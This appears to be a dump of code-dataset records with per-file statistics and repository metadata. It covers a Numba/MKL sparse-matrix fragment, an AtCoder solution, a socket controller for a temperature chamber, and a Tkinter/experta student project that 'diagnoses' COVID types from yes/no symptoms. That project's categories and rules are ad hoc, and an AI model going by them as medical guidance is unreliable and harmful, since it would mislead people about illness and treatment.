if a_h.H and b_h.H:
h = lk_mkl_spmabt(a_h.H, b_h.H)
else:
h = 0
return mkl_h(h, a_h.nrows, b_h.nrows, None)
@njit(nogil=True)
def mult_vec(a_h, x):
y = np.zeros(a_h.nrows, dtype=np.float64)
if a_h.H:
_x = ffi.from_buffer(x)
_y = ffi.from_buffer(y)
lk_mkl_spmv(1.0, a_h.H, _x, 0.0, _y)
return y
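# Note on the handle convention (derived from the code above, comments only):
# mult_ab / mult_abt return an mkl_h wrapping the MKL sparse product; when
# either operand handle is unset, h = 0 is stored so callers can detect an
# empty result while the row/column dimensions stay correct.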
| 17.452381
| 47
| 0.587995
| 153
| 733
| 2.522876
| 0.281046
| 0.072539
| 0.046632
| 0.124352
| 0.450777
| 0.398964
| 0.274611
| 0.274611
| 0.274611
| 0.274611
| 0
| 0.020716
| 0.27558
| 733
| 41
| 48
| 17.878049
| 0.706215
| 0.013643
| 0
| 0.3
| 0
| 0
| 0.020804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.133333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a01762ca3e759a9a379ad71578ccb40a1edcad3d
| 738
|
py
|
Python
|
contests_atcoder/abc153/abc153_f.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
contests_atcoder/abc153/abc153_f.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | 1
|
2021-01-02T06:36:51.000Z
|
2021-01-02T06:36:51.000Z
|
contests_atcoder/abc153/abc153_f.py
|
takelifetime/competitive-programming
|
e7cf8ef923ccefad39a1727ca94c610d650fcb76
|
[
"BSD-2-Clause"
] | null | null | null |
from bisect import bisect_left, bisect_right
from collections import deque, Counter
from itertools import combinations, permutations
from math import gcd, sin, cos, tan, degrees, radians
import sys
input = lambda: sys.stdin.readline().rstrip()
MOD = 10 ** 9 + 7
INF = float("inf")
n, d, a = map(int, input().split())
monsters = [tuple(map(int, input().split())) for _ in range(n)]
monsters.sort()
now = 0          # attacks already covering the current position
ans = 0
bomb = deque()   # (rightmost coordinate affected, attack count) per bomb batch
for m in monsters:
    x = m[0]
    attack_count = -(-m[1] // a)  # ceil(health / damage) attacks needed
    # expire bomb batches whose range ends before this monster
    while len(bomb) and bomb[0][0] < x:
        b = bomb.popleft()
        now -= b[1]
    if attack_count > now:
        # place the missing attacks at x + d so they cover [x, x + 2d]
        ans += attack_count - now
        bomb.append((x + 2 * d, attack_count - now))
        now = attack_count
print(ans)
| 23.0625
| 63
| 0.624661
| 113
| 738
| 4.00885
| 0.530973
| 0.121413
| 0.092715
| 0.07064
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021164
| 0.231707
| 738
| 32
| 64
| 23.0625
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0.00406
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a017a1ab05231fbc634e10328c46e53e752448d8
| 16,532
|
py
|
Python
|
sistema_experto.py
|
Erubeyy/SistemaExperto-
|
6194f798fad684eb83635fe85bf3f1a7d70ed2a2
|
[
"MIT"
] | null | null | null |
sistema_experto.py
|
Erubeyy/SistemaExperto-
|
6194f798fad684eb83635fe85bf3f1a7d70ed2a2
|
[
"MIT"
] | null | null | null |
sistema_experto.py
|
Erubeyy/SistemaExperto-
|
6194f798fad684eb83635fe85bf3f1a7d70ed2a2
|
[
"MIT"
] | null | null | null |
from tkinter import*
from tkinter import font
from experta import *
raiz = Tk()
raiz.title("Sistema experto- Tipos de covid")
raiz.config(bg="#f4f7fa")
#raiz.resizable(0,0)
mi0Frame = Frame(raiz)#, width="1200", height="700")
mi0Frame.grid(row=1, column=0)
mi0Frame.config(bg="#f4f7fa")
mi3Frame = Frame(raiz)#, width="1200", height="700")
mi3Frame.grid(row=1, column=1)
mi3Frame.config(bg="#f4f7fa")
miFrame = Frame(raiz)#, width="1200", height="700")
miFrame.grid(row=2, column=0)
miFrame.config(bg="#f4f7fa")
mi2Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi2Frame.grid(row=2, column=1)
mi2Frame.config(bg="#f4f7fa")
mi4Frame = Frame(raiz, highlightbackground="black", highlightthickness=0.5)
mi4Frame.grid(row=0, column=0)
mi4Frame.config(bg="#f4f7fa")
reinicio = 0
#----------------------------------------------- SYMPTOM INPUT FIELDS ------------------------------------------------------------
sin0 = Label(miFrame, text="Dolor de cabeza:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin0.grid(row=0, column=0,padx=10, pady=10,sticky="e")
in_sin0 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin0.grid(row=0, column=1,padx=10, pady=10)
sin1 = Label(miFrame, text="Perdida del olfato:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin1.grid(row=1, column=0,padx=10, pady=10,sticky="e")
in_sin1 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin1.grid(row=1, column=1,padx=10, pady=10)
sin2 = Label(miFrame, text="Dolor muscular:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin2.grid(row=2, column=0,padx=10, pady=10,sticky="e")
in_sin2 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin2.grid(row=2, column=1,padx=10, pady=10)
sin3 = Label(miFrame, text="Tos:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin3.grid(row=3, column=0,padx=10, pady=10,sticky="e")
in_sin3 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin3.grid(row=3, column=1,padx=10, pady=10)
sin4 = Label(miFrame, text="Dolor de garganta:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin4.grid(row=4, column=0,padx=10, pady=10,sticky="e")
in_sin4 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin4.grid(row=4, column=1,padx=10, pady=10)
sin5 = Label(miFrame, text="Dolor en el pecho:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin5.grid(row=5, column=0,padx=10, pady=10,sticky="e")
in_sin5 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin5.grid(row=5, column=1,padx=10, pady=10)
sin6 = Label(miFrame, text="Fiebre:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin6.grid(row=6, column=0,padx=10, pady=10,sticky="e")
in_sin6 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin6.grid(row=6, column=1,padx=10, pady=10)
sin7 = Label(miFrame, text="Ronquera:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin7.grid(row=7, column=0,padx=10, pady=10,sticky="e")
in_sin7 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin7.grid(row=7, column=1,padx=10, pady=10)
sin8 = Label(miFrame, text="Pérdida del apetito:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin8.grid(row=8, column=0,padx=10, pady=10,sticky="e")
in_sin8 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin8.grid(row=8, column=1,padx=10, pady=10)
sin9 = Label(miFrame, text="Diarrea:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin9.grid(row=9, column=0,padx=10, pady=10,sticky="e")
in_sin9 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin9.grid(row=9, column=1,padx=10, pady=10)
sin10 = Label(miFrame, text="Fatiga:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin10.grid(row=10, column=0,padx=10, pady=10,sticky="e")
in_sin10 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin10.grid(row=10, column=1,padx=10, pady=10)
sin11 = Label(miFrame, text="Confusión:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin11.grid(row=11, column=0,padx=10, pady=10,sticky="e")
in_sin11 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin11.grid(row=11, column=1,padx=10, pady=10)
sin12 = Label(miFrame, text="Dificultad para respirar:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sin12.grid(row=12, column=0,padx=10, pady=10,sticky="e")
in_sin12 = Entry(miFrame, width=10, font=('CASTELLAR', 9, font.BOLD), justify='center')
in_sin12.grid(row=12, column=1,padx=10, pady=10)
#------Result boxes--------
tipo_final_lbl = Label(mi2Frame, text="Tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
tipo_final_lbl.grid(row=2, column=0,padx=10, pady=10,sticky="n")
tipo_final = Entry(mi2Frame, width=35, justify='center', font=('FELIX TITLING', 10, font.BOLD))
tipo_final.grid(row=3, column=0, padx=1, pady=1)
blank = Label(mi2Frame, bg="#F0F8FF")
blank.grid(row=4, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo_lbl = Label(mi2Frame, text="Descripción del tipo de covid diagnosticado:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
descripcion_tipo_lbl.grid(row=5, column=0,padx=10, pady=10,sticky="n")
descripcion_tipo = Text(mi2Frame, width=60, height=10)
descripcion_tipo.grid(row=6, column=0, padx=10, pady=10)
sugerencias_lbl = Label(mi2Frame, text="Sugerencias para tratar la enfermedad:", bg="#F0F8FF", font=('Century Ghotic', 10, font.BOLD))
sugerencias_lbl.grid(row=7, column=0,padx=10, pady=10,sticky="n")
sugerencias = Text(mi2Frame, width=60, height=10)
sugerencias.grid(row=8, column=0, padx=10, pady=10)
#------HEADER--------
head1 = Label(mi0Frame, text="\nSÍNTOMAS", bg="#F0F8FF", font=('Elephant', 15))
head1.grid(row=0, column=0, sticky="n")
head1_0 = Label(mi3Frame, text="DIAGNÓSTICO", bg="#F0F8FF", font=('Elephant', 15))
head1_0.grid(row=0, column=0, sticky="n")
spacer1 = Label(mi0Frame, bg="#F0F8FF")  # renamed: this blank spacer was shadowing head1
spacer1.grid(row=1, column=0, sticky="n")
head2 = Label(mi0Frame, text=" -Introduce un 'si' o un 'no' dependiendo de los síntomas que presentes",
bg="#F0F8FF", font=('Century Ghotic', 11))
head2.grid(row=2, column=0, sticky="n" )
head3 = Label(mi4Frame, text="Sistema experto - Tipos de COVID", bg="#F0F8FF", font=('Elephant', 15))
head3.grid(row=0)
#-----------------------------------------^^^^^^SYMPTOM INPUTS^^^^^^------------------------------------------------------
lista_tipos = []
sintomas_tipo = []
map_sintomas = {}
d_desc_map = {}
d_tratamiento_map = {}
def preprocess():
global lista_tipos,sintomas_tipo,map_sintomas,d_desc_map,d_tratamiento_map
tipos = open("tipos.txt")
tipos_t = tipos.read()
lista_tipos = tipos_t.split("\n")
tipos.close()
for tipo in lista_tipos:
tipo_s_file = open("Sintomas tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
s_list = tipo_s_data.split("\n")
sintomas_tipo.append(s_list)
map_sintomas[str(s_list)] = tipo
tipo_s_file.close()
tipo_s_file = open("Descripcion tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
d_desc_map[tipo] = tipo_s_data
tipo_s_file.close()
tipo_s_file = open("Tratamientos tipo/" + tipo + ".txt")
tipo_s_data = tipo_s_file.read()
d_tratamiento_map[tipo] = tipo_s_data
tipo_s_file.close()
def identificar_tipo(*arguments):
lista_sintomas = []
for sintoma in arguments:
lista_sintomas.append(sintoma)
try:
return map_sintomas[str(lista_sintomas)]
except KeyError:  # no rule matches this exact symptom combination
return None
def get_details(tipo):
return d_desc_map[tipo]
def get_tratamiento(tipo):
return d_tratamiento_map[tipo]
def no_coincide(tipo):
tipo_final.delete("1.0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
id_tipo = tipo
tipo_details = get_details(id_tipo)
tratamientos = get_tratamiento(id_tipo)
tipo_final.insert("1.0", id_tipo)
descripcion_tipo.insert("1.0", tipo_details)
sugerencias.insert("1.0", tratamientos)
#def identificar_tipo(dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera, perdida_apetito , diarrea, fatiga, confusión, dificultad_respiratoria):
class Covid(KnowledgeEngine):
@DefFacts()
def _initial_action(self):
yield Fact(action="encontrar_tipo")
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_cabeza=W())),salience = 1)
def sintoma_0(self):
self.declare(Fact(dolor_cabeza=in_sin0.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_olfato=W())),salience = 1)
def sintoma_1(self):
self.declare(Fact(perdida_olfato=in_sin1.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_muscular=W())),salience = 1)
def sintoma_2(self):
self.declare(Fact(dolor_muscular=in_sin2.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(tos=W())),salience = 1)
def sintoma_3(self):
self.declare(Fact(tos=in_sin3.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_garganta=W())),salience = 1)
def sintoma_4(self):
self.declare(Fact(dolor_garganta=in_sin4.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dolor_pecho=W())),salience = 1)
def sintoma_5(self):
self.declare(Fact(dolor_pecho=in_sin5.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(fiebre=W())),salience = 1)
def sintoma_6(self):
self.declare(Fact(fiebre=in_sin6.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(ronquera=W())),salience = 1)
def sintoma_7(self):
self.declare(Fact(ronquera=in_sin7.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(perdida_apetito=W())),salience = 1)
def sintoma_8(self):
self.declare(Fact(perdida_apetito=in_sin8.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(diarrea=W())),salience = 1)
def sintoma_9(self):
self.declare(Fact(diarrea=in_sin9.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(fatiga=W())),salience = 1)
def sintoma_10(self):
self.declare(Fact(fatiga=in_sin10.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(confusion=W())),salience = 1)
def sintoma_11(self):
self.declare(Fact(confusion=in_sin11.get()))
@Rule(Fact(action='encontrar_tipo'), NOT(Fact(dificultad_respiratoria=W())),salience = 1)
def sintoma_12(self):
self.declare(Fact(dificultad_respiratoria=in_sin12.get()))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_0(self):
self.declare(Fact(tipo="Gripal sin fiebre"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="no"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_1(self):
self.declare(Fact(tipo="Gripal con fiebre"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="si"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_2(self):
self.declare(Fact(tipo="Gastro Intestinal"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="no"),Fact(tos="si"),Fact(dolor_garganta="no"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_3(self):
self.declare(Fact(tipo="Nivel severo uno"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="no"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="no"))
def tipo_4(self):
self.declare(Fact(tipo="Nivel severo dos"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="si"),Fact(perdida_olfato="si"),Fact(dolor_muscular="si"),Fact(tos="si"),Fact(dolor_garganta="si"),Fact(dolor_pecho="si"),Fact(fiebre="si"),Fact(ronquera="si"),Fact(perdida_apetito="si"),Fact(diarrea="si"),Fact(fatiga="si"),Fact(confusion="si"),Fact(dificultad_respiratoria="si"))
def tipo_5(self):
self.declare(Fact(tipo="Nivel severo tres"))
@Rule(Fact(action='encontrar_tipo'),Fact(dolor_cabeza="no"),Fact(perdida_olfato="no"),Fact(dolor_muscular="no"),Fact(tos="no"),Fact(dolor_garganta="no"),Fact(dolor_pecho="no"),Fact(fiebre="no"),Fact(ronquera="no"),Fact(perdida_apetito="no"),Fact(diarrea="no"),Fact(fatiga="no"),Fact(confusion="no"),Fact(dificultad_respiratoria="no"))
def tipo_6(self):
self.declare(Fact(tipo="No es covid"))
@Rule(Fact(action='encontrar_tipo'),Fact(tipo=MATCH.tipo),salience = -998)
def tipo(self, tipo):
tipo_final.delete("0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
id_tipo = tipo
tipo_details = get_details(id_tipo)
tratamientos = get_tratamiento(id_tipo)
tipo_final.insert("0", id_tipo)
descripcion_tipo.insert("1.0", tipo_details)
sugerencias.insert("1.0",tratamientos)
@Rule(Fact(action='encontrar_tipo'),
Fact(dolor_cabeza=MATCH.dolor_cabeza),
Fact(perdida_olfato=MATCH.perdida_olfato),
Fact(dolor_muscular=MATCH.dolor_muscular),
Fact(tos=MATCH.tos),
Fact(dolor_garganta=MATCH.dolor_garganta),
Fact(dolor_pecho=MATCH.dolor_pecho),
Fact(fiebre=MATCH.fiebre),
Fact(ronquera=MATCH.ronquera),
Fact(perdida_apetito=MATCH.perdida_apetito),
Fact(diarrea=MATCH.diarrea),
Fact(fatiga=MATCH.fatiga),
Fact(confusion=MATCH.confusion),
Fact(dificultad_respiratoria=MATCH.dificultad_respiratoria),NOT(Fact(tipo=MATCH.tipo)),salience = -999)
def not_matched(self,dolor_cabeza, perdida_olfato, dolor_muscular, tos, dolor_garganta, dolor_pecho, fiebre, ronquera,perdida_apetito ,diarrea ,fatiga ,confusion ,dificultad_respiratoria):
global reinicio
if reinicio == 0:
tipo_final.delete("0", END)
descripcion_tipo.delete("1.0", END)
sugerencias.delete("1.0", END)
tipo_final.insert("0", "Sin coincidencia")
descripcion_tipo.insert("1.0", "No se encontró un tipo de covid que se relacione con los síntomas presentados")
sugerencias.insert("1.0", "Se sugiere consultar a un médico que le ayude a descubrir su tipo de enfermedad")
else:
reinicio = 0
def iniciar_sistema():
if __name__ == "__main__":
preprocess()
engine = Covid()
engine.reset()
engine.run()
def reiniciar():
global reinicio
reinicio = 1
in_sin0.delete("0", END)
in_sin1.delete("0", END)
in_sin2.delete("0", END)
in_sin3.delete("0", END)
in_sin4.delete("0", END)
in_sin5.delete("0", END)
in_sin6.delete("0", END)
in_sin7.delete("0", END)
in_sin8.delete("0", END)
in_sin9.delete("0", END)
in_sin10.delete("0", END)
in_sin11.delete("0", END)
in_sin12.delete("0", END)
tipo_final.delete("0", END)
descripcion_tipo.delete('1.0', END)
sugerencias.delete('1.0', END)
preprocess()
engine = Covid()
engine.reset()
engine.run()
def salir():
exit()
#------------------BUTTONS---------------------------------------
generarTabla = Button(
miFrame,
text="RESULTADO",
command=iniciar_sistema,
bg="#7fd1ff",
font=("Eurostile", 10, font.BOLD),
padx=20,
pady=5
)
generarTabla.grid(row=13, column=1, padx=10, pady=15)
reiniciar_btn = Button(  # renamed so the widget does not shadow the reiniciar() callback
mi2Frame, text="REINICIAR",
command=reiniciar,
bg="#7fd1ff",
font=("Eurostile", 10, font.BOLD),
padx=20,
pady=5
)
reiniciar_btn.grid(row=9, column=0, padx=10, pady=15)
salir_btn = Button(  # renamed so the widget does not shadow the salir() callback
mi2Frame, text="SALIR",
command=salir,
bg="#ea9999",
font=("Eurostile", 9),
border='2p',
padx=20,
pady=3
)
salir_btn.grid(row=10, column=0, padx=10, pady=15)
raiz.mainloop()
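The knowledge base above is loaded from plain-text files by preprocess(). A minimal sketch of the expected on-disk layout, with type names taken from the rules above; the file contents themselves are illustrative:

# tipos.txt -- one covid type per line, e.g.:
#   Gripal sin fiebre
#   Gripal con fiebre
# For each type <T> listed there, three more files are read:
#   Sintomas tipo/<T>.txt      -- one symptom per line
#   Descripcion tipo/<T>.txt   -- free-text description shown in the GUI
#   Tratamientos tipo/<T>.txt  -- free-text treatment suggestions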
| 43.851459
| 335
| 0.687576
| 2,486
| 16,532
| 4.445696
| 0.095736
| 0.026059
| 0.031668
| 0.034745
| 0.68232
| 0.576909
| 0.525154
| 0.504705
| 0.402823
| 0.332338
| 0
| 0.04531
| 0.108214
| 16,532
| 377
| 336
| 43.851459
| 0.704334
| 0.041979
| 0
| 0.15082
| 0
| 0
| 0.136025
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101639
| false
| 0
| 0.009836
| 0.006557
| 0.12459
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a017aa5f81d90682eeec3d31e4bdb2e999666f4b
| 6,105
|
py
|
Python
|
socket_temperature_connect.py
|
MeowMeowZi/PPLTestTool
|
576f28fb20680b1ed33520d92c552ccafc93d716
|
[
"MIT"
] | null | null | null |
socket_temperature_connect.py
|
MeowMeowZi/PPLTestTool
|
576f28fb20680b1ed33520d92c552ccafc93d716
|
[
"MIT"
] | null | null | null |
socket_temperature_connect.py
|
MeowMeowZi/PPLTestTool
|
576f28fb20680b1ed33520d92c552ccafc93d716
|
[
"MIT"
] | null | null | null |
import socket
import time
import shelve
preset_command = {
1: ['MB0023,1', 'MI0695,'],
2: ['MB0024,1', 'MI0696,'],
3: ['MB0076,1', 'MI0697,'],
4: ['MB0026,1', 'MI0698,'],
}
force_command = 'MB0336,1'
start_command = 'MB0020,0'
stop_command = 'MB0020,1'
class Temperature:
def __init__(self):
# flag: a new log message is available
self.is_info = False
# the log message to print
self.info = ''
# temperature test tasks
self.task = []
# open the configuration file
self.init_temp = shelve.open('init/init_temp')
self.ip = self.init_temp['temp_ip']
self.channel1_temp = self.init_temp['temp_channel1_temp']
self.channel2_temp = self.init_temp['temp_channel2_temp']
self.channel3_temp = self.init_temp['temp_channel3_temp']
self.channel4_temp = self.init_temp['temp_channel4_temp']
self.is_channel1_temp = self.init_temp['temp_is_channel1_temp']
self.is_channel2_temp = self.init_temp['temp_is_channel2_temp']
self.is_channel3_temp = self.init_temp['temp_is_channel3_temp']
self.is_channel4_temp = self.init_temp['temp_is_channel4_temp']
# close the configuration file
self.init_temp.close()
self.channel1 = (self.channel1_temp, 1)
self.channel2 = (self.channel2_temp, 2)
self.channel3 = (self.channel3_temp, 3)
self.channel4 = (self.channel4_temp, 4)
# create the socket
self.server = socket.socket()
# self.ip = '192.168.0.14'
self.port = 5000
try:
self.server.connect((self.ip, self.port))
# print('[INFO-TEMP]connect successfully')
self.send_info('[INFO-TEMP]connect successfully')
time.sleep(1)
except OSError:  # narrowed from a bare except; socket errors derive from OSError
# print('[FAIL-TEMP]connect fail')
self.send_info('[FAIL-TEMP]connect fail')
# send data to the device
def send(self, data):
try:
self.server.send(bytes(data, encoding='ASCII'))
except ConnectionError:
# print('[FAIL-TEMP]send data fail')
self.send_info('[FAIL-TEMP]send data fail')
# receive data from the device
def recv(self):
try:
text = str(self.server.recv(1024), encoding='UTF-8')
# print(text)
except ConnectionError:
# print('[FAIL-TEMP]receive error')
self.send_info('[FAIL-TEMP]receive error')
text = ',9990'
return text
# send a command (the device expects an 'm' prefix first)
def command(self, command):
self.send('m')
time.sleep(1)
self.send(command)
time.sleep(1)
# write command (no return value)
def write_command(self, command):
self.command(command)
self.ack()
# query command (returns the device response)
def query_command(self, command):
self.command(command)
return self.recv()
# wait for the device acknowledgement
def ack(self):
while True:
if self.recv() == 'OK':
break
# temperature preset (four channels)
def preset(self, channel):
temp = int(channel[0])
# clamp to the supported range first; in the original elif chain the
# >= 175 and <= -75 branches were unreachable (temp > 99 / temp < -9 always matched first)
if temp >= 175:
temp = 175
elif temp <= -75:
temp = -75
temp_command = ''
if temp == 0:
temp_command = '0000'
elif 0 < temp < 10:
temp_command = '00' + str(temp) + '0'
elif 9 < temp < 100:
temp_command = '0' + str(temp) + '0'
elif temp > 99:
temp_command = str(temp) + '0'
elif -10 < temp < 0:
temp_command = '0' + str(temp) + '0'
elif temp < -9:
temp_command = str(temp) + '0'
channel_command = preset_command[channel[1]][1]
command = channel_command + temp_command
self.write_command(command)
# print('[INFO-TEMP]channel%s, %s℃ set successfully!' % (channel[1], channel[0]))
self.send_info('[INFO-TEMP]channel' + str(channel[1]) + ', ' + str(channel[0]) +'℃ set successfully!')
# select the given preset as the active one
def change_channel(self, channel):
state_command = preset_command[channel[1]][0]
self.write_command(state_command)
# print('[INFO-TEMP]change channel:', channel[1])
self.send_info('[INFO-TEMP]change channel ' + str(channel[1]) + " " + str(channel[0]) + '℃')
# add the enabled test items to the task list
def task_generate(self):
if self.is_channel1_temp:
self.preset((self.channel1_temp, 1))
self.task.append(self.channel1)
if self.is_channel2_temp:
self.preset((self.channel2_temp, 2))
self.task.append(self.channel2)
if self.is_channel3_temp:
self.preset((self.channel3_temp, 3))
self.task.append(self.channel3)
if self.is_channel4_temp:
self.preset((self.channel4_temp, 4))
self.task.append(self.channel4)
self.write_command(force_command)
# print('[INFO-TEMP]force on')
self.send_info('[INFO-TEMP]force on')
# check the device temperature (polled once per second)
def check_temp(self, channel):
while True:
for i in range(3):
text = self.query_command('MI0006?')  # response format: MI6,250
temp1 = int(text.split(',')[1])  # 250 = integer digits + one decimal digit
# print('[INFO-TEMP]temp: ', temp1 / 10.0, '℃')
self.send_info('[INFO-TEMP]temp: ' + str(temp1 / 10.0) + '℃')
temp = int(channel[0])
if (temp1 == temp * 10) and (i == 2):
return
elif temp1 == temp * 10:
pass
else:
break
# start the device
def start(self):
self.write_command(start_command)
# print('[INFO-TEMP]running!')
self.send_info('[INFO-TEMP]running!')
# shut down the device
def stop(self):
self.write_command(stop_command)
# print('[INFO-TEMP]close!')
self.send_info('[INFO-TEMP]close!')
# used to switch between tasks
def run(self, task):
self.change_channel(task)
self.check_temp(task)
time.sleep(1)
# pass data to the main thread
def send_info(self, info):
self.info = info
self.is_info = True
if __name__ == '__main__':
temperature = Temperature()
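A minimal driver sketch continuing from the temperature instance created in the __main__ block above, assuming the shelve configuration under init/init_temp exists and the chamber answers at the configured IP; the loop below is hypothetical and only chains the methods defined above:

temperature.task_generate()      # preset the enabled channels, force output on
temperature.start()              # send the start command
for task in temperature.task:    # each task is a (temperature, channel) tuple
    temperature.run(task)        # switch channel and poll until the target is held
temperature.stop()               # send the stop command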
| 30.678392
| 110
| 0.552826
| 740
| 6,105
| 4.409459
| 0.197297
| 0.051486
| 0.040454
| 0.044131
| 0.350291
| 0.178057
| 0.064664
| 0.050567
| 0.019001
| 0
| 0
| 0.049157
| 0.310238
| 6,105
| 198
| 111
| 30.833333
| 0.723344
| 0.106143
| 0
| 0.138686
| 0
| 0
| 0.103156
| 0.015501
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109489
| false
| 0.007299
| 0.021898
| 0
| 0.160584
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a0187e302825ea7cb1c14461fb74435494c1cd4b
| 12,938
|
py
|
Python
|
wwwdccn/chair_mail/models.py
|
